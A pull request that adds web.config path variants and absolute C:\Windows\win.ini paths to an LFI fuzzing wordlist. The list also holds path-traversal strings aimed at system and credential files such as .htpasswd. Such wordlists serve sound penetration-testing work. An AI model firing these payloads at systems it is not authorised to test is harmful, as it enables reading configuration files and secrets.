### PR TITLE
LFI: added absolute C:\Windows\win.ini paths and web.config

### DIFF
--- a/Fuzzing/LFI/LFI-Jhaddix.txt
+++ b/Fuzzing/LFI/LFI-Jhaddix.txt
@@ -83,6 +83,11 @@ C:\boot.ini
 C:/inetpub/wwwroot/global.asa
 C:\inetpub\wwwroot\global.asa
 c:\inetpub\wwwroot\index.asp
+web.config
+/web.config
+\web.config
+../web.config
+..\web.config
 /config.asp
 ../config.asp
 config.asp
@@ -781,6 +786,8 @@ users/.htpasswd
 /Volumes/webBackup/private/etc/httpd/httpd.conf.default
 /web/conf/php.ini
 /WINDOWS\php.ini
+C:\Windows\win.ini
+C:/Windows/win.ini
 ../../windows/win.ini
 ../../../../../../../../windows/win.ini
 ..\..\..\..\..\..\..\..\windows\win.ini


### PR DESCRIPTION
Added additional entries to `LFI-Jhaddix.txt` for testing LFI and arbitrary file retrieval:

- added absolute paths of the default file `C:\Windows\win.ini` which were missing until now
- added entries for `web.config` which typically resides in the web root
